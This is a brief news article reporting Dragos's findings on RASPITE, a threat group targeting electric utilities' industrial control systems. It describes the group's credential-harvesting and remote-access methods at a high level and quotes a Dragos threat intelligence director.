New ICS Adversary Group Targeting US Utilities

ICS Utilities

A newly discovered adversarial group has been targeting operations in electrical utilities in the US, according to Dragos. The activity group, dubbed RASPITE, has reportedly been active in some capacity since early to mid-2017.

Dragos has confirmed that RASPITE is now targeting ICS, specifically electric utilities in the US, Europe, Middle East and East Asia. While researchers have confirmed that this new group is targeting electric utilities, there is no current indication the group has the capability of destructive ICS attacks, including widespread blackouts like those in Ukraine.

Detailed in a blog post, analysis of the group’s activity revealed that the group currently focuses on initial access operations within the electrical utility sector. They gain access to their target networks by leveraging strategic website compromise. RASPITE also maps to LeafMiner, a group that Symantec recently reported on in the Middle East.

“RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials,” the blog post stated. Deploying install scripts grants them remote access to the victim machine via a malicious service that beacons back to RASPITE-controlled infrastructure.

“Dragos caught RASPITE early in its maturity, which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques, which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” said Sergio Caltagirone, director of threat intelligence, Dragos.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups. Although Dragos does not conduct country-specific attribution of industrial control threats, generally threats focused on industrial control are state sponsored due to the inherent risk, limited financial gain and potential blow back from the operations.”

Products You May Like

Articles You May Like

Calendly CEO Tope Awotona is joining us at Disrupt 2021
Most Twitter users haven’t enabled 2FA yet, report reveals
The pandemic effect is slowing
A New Wiper Malware Was Behind Recent Cyberattack On Iranian Train System
Kuda, the African challenger bank, raises $55M at a $500M valuation

Leave a Reply

Your email address will not be published. Required fields are marked *